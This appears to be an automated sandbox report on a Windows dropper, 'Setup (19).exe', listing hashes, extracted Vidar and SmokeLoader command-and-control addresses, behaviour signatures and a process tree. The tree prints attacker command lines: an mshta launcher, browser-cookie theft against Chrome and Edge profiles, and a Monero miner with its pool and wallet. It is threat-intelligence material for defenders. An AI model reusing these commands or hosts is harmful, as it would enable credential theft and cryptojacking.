Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    400s
  • max time network
    1784s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-08-2021 15:20

General

  • Target

    Setup (19).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

973

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    973

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 15 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • Blocklisted process makes network request 34 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 15 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 31 IoCs
  • Suspicious use of SetThreadContext 16 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 52 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 11 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1064
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2336
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2624
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2632
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
            • Suspicious use of SetThreadContext
            PID:2536
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies registry class
              PID:1892
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2376
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1824
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1260
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1236
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:964
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1008
                      • C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:796
                        • C:\Users\Admin\Documents\hlDvqLwU54UDFScPHPuA8OxB.exe
                          "C:\Users\Admin\Documents\hlDvqLwU54UDFScPHPuA8OxB.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2352
                        • C:\Users\Admin\Documents\iKmUXAGmw3tVAfgJ5zJLVXCZ.exe
                          "C:\Users\Admin\Documents\iKmUXAGmw3tVAfgJ5zJLVXCZ.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:3900
                          • C:\Users\Admin\Documents\iKmUXAGmw3tVAfgJ5zJLVXCZ.exe
                            "C:\Users\Admin\Documents\iKmUXAGmw3tVAfgJ5zJLVXCZ.exe"
                            3⤵
                            • Modifies data under HKEY_USERS
                            PID:9792
                        • C:\Users\Admin\Documents\xnfsbYJ20zU8eymZg8i7tP43.exe
                          "C:\Users\Admin\Documents\xnfsbYJ20zU8eymZg8i7tP43.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:3876
                        • C:\Users\Admin\Documents\YpcSAkvoQLMUVYbuS5ZaO1vb.exe
                          "C:\Users\Admin\Documents\YpcSAkvoQLMUVYbuS5ZaO1vb.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:1456
                          • C:\Users\Admin\Documents\YpcSAkvoQLMUVYbuS5ZaO1vb.exe
                            "C:\Users\Admin\Documents\YpcSAkvoQLMUVYbuS5ZaO1vb.exe"
                            3⤵
                              PID:6320
                          • C:\Users\Admin\Documents\1_ZWevwuNQwsggPnwb3aFGVu.exe
                            "C:\Users\Admin\Documents\1_ZWevwuNQwsggPnwb3aFGVu.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:1380
                            • C:\Users\Admin\Documents\1_ZWevwuNQwsggPnwb3aFGVu.exe
                              "C:\Users\Admin\Documents\1_ZWevwuNQwsggPnwb3aFGVu.exe" -q
                              3⤵
                              • Executes dropped EXE
                              PID:4628
                          • C:\Users\Admin\Documents\rGyYOC57euUVvmuqtzkIhapw.exe
                            "C:\Users\Admin\Documents\rGyYOC57euUVvmuqtzkIhapw.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:1112
                            • C:\Users\Admin\Documents\rGyYOC57euUVvmuqtzkIhapw.exe
                              "C:\Users\Admin\Documents\rGyYOC57euUVvmuqtzkIhapw.exe"
                              3⤵
                                PID:6708
                              • C:\Users\Admin\Documents\rGyYOC57euUVvmuqtzkIhapw.exe
                                "C:\Users\Admin\Documents\rGyYOC57euUVvmuqtzkIhapw.exe"
                                3⤵
                                  PID:6988
                              • C:\Users\Admin\Documents\utZXrPHFYUElVNZedWMy62mc.exe
                                "C:\Users\Admin\Documents\utZXrPHFYUElVNZedWMy62mc.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1480
                              • C:\Users\Admin\Documents\bJDlaAKyRrK7h2AwDOBo4Wdt.exe
                                "C:\Users\Admin\Documents\bJDlaAKyRrK7h2AwDOBo4Wdt.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3820
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 276
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3984
                              • C:\Users\Admin\Documents\mwydizUv6TznrvRgVpNqSxhB.exe
                                "C:\Users\Admin\Documents\mwydizUv6TznrvRgVpNqSxhB.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1756
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 896
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:5744
                              • C:\Users\Admin\Documents\NvPQuix8WDEMG9BJolTXJ32I.exe
                                "C:\Users\Admin\Documents\NvPQuix8WDEMG9BJolTXJ32I.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:520
                              • C:\Users\Admin\Documents\MVfNNPwqQ2ZGyHStvhmC_93q.exe
                                "C:\Users\Admin\Documents\MVfNNPwqQ2ZGyHStvhmC_93q.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2256
                              • C:\Users\Admin\Documents\KcFzqAKGlbaSF7HaE5tMQsZU.exe
                                "C:\Users\Admin\Documents\KcFzqAKGlbaSF7HaE5tMQsZU.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2292
                                • C:\Users\Admin\Documents\KcFzqAKGlbaSF7HaE5tMQsZU.exe
                                  "C:\Users\Admin\Documents\KcFzqAKGlbaSF7HaE5tMQsZU.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3116
                              • C:\Users\Admin\Documents\vpSUgBJblSFWtKkgAdgtOZf0.exe
                                "C:\Users\Admin\Documents\vpSUgBJblSFWtKkgAdgtOZf0.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:4040
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\vpSUgBJblSFWtKkgAdgtOZf0.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\vpSUgBJblSFWtKkgAdgtOZf0.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                  3⤵
                                    PID:4472
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\vpSUgBJblSFWtKkgAdgtOZf0.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\vpSUgBJblSFWtKkgAdgtOZf0.exe" ) do taskkill -f -iM "%~NxA"
                                      4⤵
                                        PID:4312
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill -f -iM "vpSUgBJblSFWtKkgAdgtOZf0.exe"
                                          5⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3604
                                  • C:\Users\Admin\Documents\Q5JbkZnsYQymY5Lk4UZp0TwR.exe
                                    "C:\Users\Admin\Documents\Q5JbkZnsYQymY5Lk4UZp0TwR.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2568
                                  • C:\Users\Admin\Documents\HNiUqfBeAWcDkR_V_17176Su.exe
                                    "C:\Users\Admin\Documents\HNiUqfBeAWcDkR_V_17176Su.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:188
                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:4684
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                        • Executes dropped EXE
                                        PID:6112
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:4696
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:5832
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:6304
                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            • Drops file in Program Files directory
                                            PID:4640
                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4584
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:4760
                                          • C:\Users\Admin\Documents\gImcae9NIkoQ0kvxxVAISwM4.exe
                                            "C:\Users\Admin\Documents\gImcae9NIkoQ0kvxxVAISwM4.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:220
                                          • C:\Users\Admin\Documents\8NoaL43WhzVMIQB0AXY9gbKO.exe
                                            "C:\Users\Admin\Documents\8NoaL43WhzVMIQB0AXY9gbKO.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:208
                                          • C:\Users\Admin\Documents\qjGlNwxzy2FzJQeI6kXKQ068.exe
                                            "C:\Users\Admin\Documents\qjGlNwxzy2FzJQeI6kXKQ068.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2232
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 1740
                                              3⤵
                                              • Program crash
                                              PID:5604
                                          • C:\Users\Admin\Documents\z9H8r4EFhF2zJVyyVRMw9i4c.exe
                                            "C:\Users\Admin\Documents\z9H8r4EFhF2zJVyyVRMw9i4c.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:1744
                                            • C:\Users\Admin\Documents\z9H8r4EFhF2zJVyyVRMw9i4c.exe
                                              C:\Users\Admin\Documents\z9H8r4EFhF2zJVyyVRMw9i4c.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5084
                                          • C:\Users\Admin\Documents\cBh6LDxHjahl19bMNITfH2Fi.exe
                                            "C:\Users\Admin\Documents\cBh6LDxHjahl19bMNITfH2Fi.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:3852
                                            • C:\Users\Admin\Documents\cBh6LDxHjahl19bMNITfH2Fi.exe
                                              C:\Users\Admin\Documents\cBh6LDxHjahl19bMNITfH2Fi.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:5116
                                            • C:\Users\Admin\Documents\cBh6LDxHjahl19bMNITfH2Fi.exe
                                              C:\Users\Admin\Documents\cBh6LDxHjahl19bMNITfH2Fi.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2328
                                          • C:\Users\Admin\Documents\iAxbROcHfqaug27WQcrYrVYw.exe
                                            "C:\Users\Admin\Documents\iAxbROcHfqaug27WQcrYrVYw.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:588
                                            • C:\Users\Admin\AppData\Roaming\7948182.exe
                                              "C:\Users\Admin\AppData\Roaming\7948182.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2404
                                            • C:\Users\Admin\AppData\Roaming\2513275.exe
                                              "C:\Users\Admin\AppData\Roaming\2513275.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:5072
                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5436
                                            • C:\Users\Admin\AppData\Roaming\5357300.exe
                                              "C:\Users\Admin\AppData\Roaming\5357300.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4552
                                            • C:\Users\Admin\AppData\Roaming\7058557.exe
                                              "C:\Users\Admin\AppData\Roaming\7058557.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4264
                                          • C:\Users\Admin\Documents\F0E5dZsieFFOKn8zOF9cr5zc.exe
                                            "C:\Users\Admin\Documents\F0E5dZsieFFOKn8zOF9cr5zc.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4008
                                          • C:\Users\Admin\Documents\GQRC2O5MF90vN5Utt08BdcJu.exe
                                            "C:\Users\Admin\Documents\GQRC2O5MF90vN5Utt08BdcJu.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2752
                                          • C:\Users\Admin\Documents\WflV6cU1bfuGJQmgXQ9V7D5M.exe
                                            "C:\Users\Admin\Documents\WflV6cU1bfuGJQmgXQ9V7D5M.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:1216
                                            • C:\Users\Admin\Documents\WflV6cU1bfuGJQmgXQ9V7D5M.exe
                                              C:\Users\Admin\Documents\WflV6cU1bfuGJQmgXQ9V7D5M.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5060
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 1216
                                                4⤵
                                                • Program crash
                                                PID:4676
                                          • C:\Users\Admin\Documents\elmRPBGSkLoUZHdItEXST4ci.exe
                                            "C:\Users\Admin\Documents\elmRPBGSkLoUZHdItEXST4ci.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2492
                                            • C:\Users\Admin\AppData\Local\Temp\is-8QS21.tmp\elmRPBGSkLoUZHdItEXST4ci.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-8QS21.tmp\elmRPBGSkLoUZHdItEXST4ci.tmp" /SL5="$10280,138429,56832,C:\Users\Admin\Documents\elmRPBGSkLoUZHdItEXST4ci.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of FindShellTrayWindow
                                              PID:4340
                                              • C:\Users\Admin\AppData\Local\Temp\is-96CIS.tmp\Setup.exe
                                                "C:\Users\Admin\AppData\Local\Temp\is-96CIS.tmp\Setup.exe" /Verysilent
                                                4⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:5644
                                                • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:6032
                                                  • C:\Users\Admin\AppData\Local\Temp\is-MFJR3.tmp\Stats.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-MFJR3.tmp\Stats.tmp" /SL5="$1031A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4316
                                                    • C:\Users\Admin\AppData\Local\Temp\is-8VTFU.tmp\builder.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\is-8VTFU.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                      7⤵
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5728
                                                • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                  "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks processor information in registry
                                                  PID:6052
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                    6⤵
                                                      PID:8112
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im runvd.exe /f
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:4404
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        7⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5880
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:6132
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472583 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                      6⤵
                                                        PID:9192
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:5240
                                                      • C:\Users\Admin\AppData\Local\Temp\is-SHHKQ.tmp\WEATHER Manager.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-SHHKQ.tmp\WEATHER Manager.tmp" /SL5="$10346,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                        6⤵
                                                          PID:5388
                                                          • C:\Users\Admin\AppData\Local\Temp\is-UBI5M.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-UBI5M.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                            7⤵
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:6488
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-UBI5M.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-UBI5M.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472583 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                              8⤵
                                                                PID:8156
                                                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:3864
                                                          • C:\Users\Admin\AppData\Local\Temp\is-3MAUM.tmp\VPN.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-3MAUM.tmp\VPN.tmp" /SL5="$103B6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
